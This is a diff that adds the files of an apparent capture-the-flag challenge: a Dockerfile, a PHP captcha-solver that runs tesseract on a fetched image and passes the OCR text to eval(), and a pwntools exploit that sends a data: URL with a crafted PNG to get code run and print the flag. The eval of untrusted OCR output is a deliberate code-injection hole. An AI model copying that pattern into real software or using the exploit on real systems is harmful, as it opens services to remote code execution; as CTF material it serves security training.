--- /dev/null
+FROM alpine
+
+COPY pwnable flag.txt /home/ctf/
+
+#RUN apk --no-cache --update add socat tesseract-ocr tesseract-ocr-data-eng php7 &&
+RUN apk --no-cache --update add socat tesseract-ocr php7 php7-dom && \
+ adduser -D -g '' ctf
+
+WORKDIR /home/ctf
+USER ctf
+EXPOSE 1337
+ENTRYPOINT ["socat", "tcp-listen:1337,fork,reuseaddr", "exec:./pwnable,PTY,stderr,raw,echo=0"]
--- /dev/null
+#!/usr/bin/env python2
+from pwn import *
+from base64 import b64encode
+import sys
+
+if len(sys.argv) != 3:
+ print('Usage: ./exploit.py <ip> <port>')
+ sys.exit(1)
+
+ip = sys.argv[1]
+port = int(sys.argv[2])
+
+p = remote(ip, port)
+
+with log.waitfor('Encoding image') as h:
+ with open('exploit.png') as f:
+ pic = b64encode(f.read()).replace('+', '%2B').replace('=', '%3D')
+ h.success('Done')
+
+payload = '<img src="data:image/png;base64,%s">' % pic
+url = 'data:,' + payload
+
+print(p.recvuntil(' > '))
+info('Sending payload')
+p.sendline(url)
+p.recvline() # eat echoed output from readline
+
+while True:
+ x = p.recvline().strip()
+ if 'SOLUTION: ' in x:
+ print(x)
+ break
+ print('REMOTE: ' + x)
--- /dev/null
+#!/usr/bin/env php
+<?php
+echo "\n";
+echo " ___________\n";
+echo " / SPAMMERS \ || || _______\n";
+echo " -={ }=- || SPAMMER || | _____ |\n";
+echo " \ PARADISE / || || ||_____||\n";
+echo " ||_________|| | ___ |\n";
+echo " | + + + + | | |___| |\n";
+echo " _|_|_ \\ | |\n";
+echo " - Specify a url to a form to spam (_____) \\ | |\n";
+echo " - The first <img> is the captcha \\ ___ | |\n";
+echo " - Solver calculates math in image (2 + 3) ______ \\__/ \\_| |\n";
+echo " - Solution is displayed (5) | _ | _/ | |\n";
+echo " - $$$ M0NEY $$$ | ( ) | / |_______|\n";
+echo " |___|__| / CA15\n";
+echo " \\_____/\n";
+echo "Target > ";
+$target = fgets(STDIN);
+
+echo "[*] Fetching url...\n";
+$html = @file_get_contents($target);
+if(!$html) die("[-] Script died\n");
+
+echo "[*] Parsing html...\n";
+$dom = DOMDocument::loadHTML($html);
+$img = $dom->getElementsByTagName('img');
+$img = $img[0]->attributes['src']->value;
+
+echo "[*] Downloading captcha...\n";
+$img = @file_get_contents($img);
+if(!$img) die("[-] Script died\n");
+
+echo "[*] Reading captcha...\n";
+$path = tempnam('/tmp', 'img');
+$f = fopen($path, 'w');
+fwrite($f, $img);
+fclose($f);
+
+echo "[*] Solving captcha...\n";
+$captcha = trim(shell_exec("tesseract $path stdout"));
+$solution = eval("return $captcha;");
+echo "SOLUTION: $solution\n";